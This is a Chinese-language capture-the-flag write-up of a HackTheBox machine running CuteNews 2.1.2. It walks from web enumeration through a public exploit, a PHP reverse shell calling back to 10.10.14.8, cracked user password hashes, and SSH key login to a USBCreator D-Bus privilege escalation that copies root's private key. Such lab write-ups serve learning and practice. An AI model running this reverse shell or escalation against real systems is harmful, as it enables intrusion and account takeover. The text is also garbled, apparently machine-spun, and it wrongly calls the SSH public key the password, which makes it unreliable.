time手机微信（热烈欢迎搔扰沟通交流）：

这是我第一次玩 hackthebox，就找一个尽可能通俗一点的，取得ip先简易扫一扫

那肯定仅有80逐渐点一下一看

那时候点了一个，就发现那样的连接（原本想跑文件目录，結果走不动就没试了）

要我试了好多个单引号，跑了下 sqlmap，随后发现并沒有，就难堪，接着再点这一红色的 RSS

顺手删掉一下 rss.php 见到登陆页面

再申请注册的情况下发现Powered by CuteNews 2.1.2 ? 2002–2020 CutePHP. ，这玩意肯定有系统漏洞

关键应该是后边2个，提交不明白明白咋更改文件夹名称，就想立即试着第二个， searchsploit CuteNews 2.1.2 -m 48800下载出来发现立即把url装进去就可以，这都能够？

发这一转化成的shell，不太好用就立即找到我小本本里的php反跳shell指令

php -r '$sock=fsockopen("10.10.14.8",4445);exec("/bin/bash -i<&3 >&3 2>&3");'

就四处找了好长时间，也试过 linux 核心系统漏洞，就注意到home文件目录下有两个登录名但沒有管理权限浏览

查看进程发现一下一个引人注意的物品

随后就没有了就挺下来想这web应当有一些提醒登陆密码啥的吧在web文件目录下寻找好长时间才发现这cdata文件目录下有物品

见到users.txt，平常见到他人文章内容在重要部位都发现users.txt，在看users文档发现全是base64的

一个破译看一下，发现有发生这两个客户，可是nadav的登陆密码没法在md5网址破译，就paul 破译出去 atlanta1

随后su发现没法取得成功

搜索一下，哦原先那样就可以了

python -c 'import pty; pty.spawn("/bin/sh")'

随后就要看了paul客户文件目录下的文档，cat .*/* 立即所有查询

见到有这一 ssh 的公钥

ssh 公与私密匙：能够转化成免密支付登陆，分成公钥和私钥，公钥才算是账户密码

ssh -i doc

PS：公钥文档务必只有是600，访问限制太高太低都不好，认为它是paul的公钥，想不到试了一下，nadav还可以登陆依据找他人文章内容提醒发现

发现USBCreator D-bus有一个插口系统漏洞，促使网络攻击可以浏览sudoer组里的客户，进而绕开sudo程序流程强加于的登陆密码安全设置。此系统漏洞容许网络攻击以根客户真实身份遮盖具备随意內容的随意文档，而不用出示登陆密码。这会造成 权利提高，比如，根据遮盖身影文档和为root密码设置。

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator--method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa(未受权浏览部位) /tmp/ssh(文档储放部位) true

运用 root 的公钥，取得成功登陆

小结：web层面进到，仔细观查，细心点，了解了ssh的公钥密匙难题，在取得地管理权限，关键搜集web网站的信息内容找提升。信息收集在渗入中至关重要。